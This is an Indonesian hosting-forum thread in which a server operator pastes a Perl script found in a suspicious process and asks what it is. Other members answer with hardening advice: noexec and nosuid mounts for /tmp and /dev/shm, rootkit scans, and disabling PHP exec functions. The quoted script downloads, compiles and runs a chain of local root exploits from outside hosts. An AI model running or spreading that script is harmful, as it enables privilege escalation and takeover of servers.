[Ask] Ini Apaan Ya Master? Please Help (Turkish Hacker)

[remajahost]

Barusan saya menemukan sesuatu yang aneh pada proses Server saya.
Saya menemukan proses seperti gambar dibawah ini:

Setelah saya coba akses URL yang berada di Proses tersebut "http://www.nbvk.nl/w/10.txt"
Hasilnya:

#!/usr/bin/perl 
# Exploit tools v2.0 coded by iskorpitx (Turkish Hacker)
# linux serverlerde gecerlidir
# iyi sanslar:)
# by iskorpitx
{ 
system("wget www.nbvk.nl/w/15704.c"); 
system("gcc 15704.c -o 1704");
system("chmod 777 1704"); 
system("./1704"); 
system("id"); 
system("wget www.nbvk.nl/w/15704");  
system("chmod 777 15704"); 
system("./15704"); 
system("id"); 
system("wget www.nbvk.nl/w/iskorpitx");  
system("chmod 777 iskorpitx"); 
system("./iskorpitx"); 
system("id"); 
print "If u r r00t stop xpl with ctrl+c\n";
system("wget www.nbvk.nl/w/44");  
system("chmod 777 44"); 
system("./44"); 
system("id"); 
system("wget www.nbvk.nl/w/exp1");  
system("chmod 777 exp1"); 
system("./exp1"); 
system("id"); 
print "If u r r00t stop xpl with ctrl+c\n";
system("wget www.nbvk.nl/w/exp2");  
system("chmod 777 exp2"); 
system("./exp2"); 
system("id");  
system("wget www.nbvk.nl/w/run2");  
system("chmod 777 run2"); 
system("./run2"); 
system("id");  
print "If u r r00t stop xpl with ctrl+c\n"; 
system("wget www.nbvk.nl/w/15285.c"); 
system("gcc 15285.c -o 15285");
system("chmod 777 15285"); 
system("./15285"); 
system("id"); 
print "If u r r00t stop xpl with ctrl+c\n"; 
system("wget www.nbvk.nl/w/15"); 
system("chmod 777 15"); 
system("./15"); 
system("id"); 
print "If u r r00t stop xpl with ctrl+c\n"; 
system("wget www.nbvk.nl/w/27"); 
system("chmod 777 27"); 
system("./27"); 
system("id"); 
system("wget www.nbvk.nl/27-1"); 
system("chmod 777 27-1"); 
system("./27-1"); 
system("id"); 
system("http://www.solarenergy.com.bd/templates/beez/15150"); 
system("chmod 777 15150"); 
system("./15150 0xc0102290 64"); 
system("id"); 
system("wget www.nbvk.nl/w/siy");
system("chmod 777 siy");
system("./siy");
system("id");
system("wget www.nbvk.nl/w/15620.sh");
system("chmod 777 15620.sh");
system("./15620.sh");
system("id");
}

Seketika juga saya langsung Suspended akun yang bersangkutan.
Bisa berikan penjelasan para master2 semua? Apakah ada kaitannya dengan mencoba menembus sistem keamanan server?

 

[cpserv]

servernya itu dedicated atau vps? itu /dev/shm nya blom diamanin ya?

contoh tutorialnya : http://sysadmingear.blogspot.com/2007/10/how-to-secure-tmp-and-devshm-partition.html

trus cek aja pake script kayaq chkrootkit dan sebagainya..

 

[remajahost]

servernya itu dedicated atau vps? itu /dev/shm nya blom diamanin ya?

contoh tutorialnya : http://sysadmingear.blogspot.com/2007/10/how-to-secure-tmp-and-devshm-partition.html

trus cek aja pake script kayaq chkrootkit dan sebagainya..

Dedicated kang
/dev/shm => untuk apa ne kang?
Ok saya baca doloe

http://sysadmingear.blogspot.com/2007/10/how-to-secure-tmp-and-devshm-partition.html => Ini di jalankan aja ya kang Di SSH?
Maaf ne, kgk begitu mudeng x_X

 

[cpserv]

/dev/shm tu cm shared memory doank. biar proses bisa lebih cepet. tapi bahaya klo ada client (asumsi dpt akses console) yg iseng/nakal.

kebanyakan script2 berbahaya tu dijalanin di /dev/shm sama /tmp jadi itu harus yg harus diamanin. dengan ada flag nosuid,noexec di mounting point harusnya script itu ga bisa jalan.

mudah2an bisa cepet sembuh ya servernya.

 

[remajahost]

/dev/shm tu cm shared memory doank. biar proses bisa lebih cepet. tapi bahaya klo ada client (asumsi dpt akses console) yg iseng/nakal.

kebanyakan script2 berbahaya tu dijalanin di /dev/shm sama /tmp jadi itu harus yg harus diamanin. dengan ada flag nosuid,noexec di mounting point harusnya script itu ga bisa jalan.

mudah2an bisa cepet sembuh ya servernya.

Hm... mengerti sekarang.
Tetapi tutor di http://sysadmingear.blogspot.com/2007/10/how-to-secure-tmp-and-devshm-partition.html bisa di jalankan di keduanya kan kang (Dedi/VPS)
Dan sekarang apakah saya harus menjalankan command yg berada di tutor? *Maaf nie pengen pastikan aja, takutnya salah malah kacau

 

[cpserv]

gpp koq itu.. klo tadi jawabannya VPS saya mau nanya lagi,, OpenVZ bukan? klo OpenVZ beda lagi cara nanganinnya.. tapi berhubung bilangnya dedicated ya ga jadi..

tapi pastiin dulu itu scriptnya udah bersih (silahkan pake script apaan aja yg bisa buat ngecek bagian mana aja yg "terinfeksi")

yg jelas nosuid,noexec,rw itu harus ada di /dev/shm sama /tmp



edit: gausah dijalanin dari awal.. cukup masukin nosuid,noexec,rw di dalem /etc/fstab bagian /dev/shm sama /tmp

abis itu mount -o remount /tmp ; mount -o remount /dev/shm

 

[remajahost]

gpp koq itu.. klo tadi jawabannya VPS saya mau nanya lagi,, OpenVZ bukan? klo OpenVZ beda lagi cara nanganinnya.. tapi berhubung bilangnya dedicated ya ga jadi..

tapi pastiin dulu itu scriptnya udah bersih (silahkan pake script apaan aja yg bisa buat ngecek bagian mana aja yg "terinfeksi")

yg jelas nosuid,noexec,rw itu harus ada di /dev/shm sama /tmp



edit: gausah dijalanin dari awal.. cukup masukin nosuid,noexec,rw di dalem /etc/fstab bagian /dev/shm sama /tmp

abis itu mount -o remount /tmp ; mount -o remount /dev/shm

woke kang...
akan di coba

 

[perdhanahost]

Nambah aja sedikit.

Sama dengan 'exec' atau 'shell_exec', fungsi function 'system' adalah execute command di CLI. Sebaiknya didisable saja. Selain 'exec', 'shell_exec', dan 'system' disable juga 'passthru', 'parse_ini_file', 'proc_open' dan 'show_source'.

Semoga bermanfaat.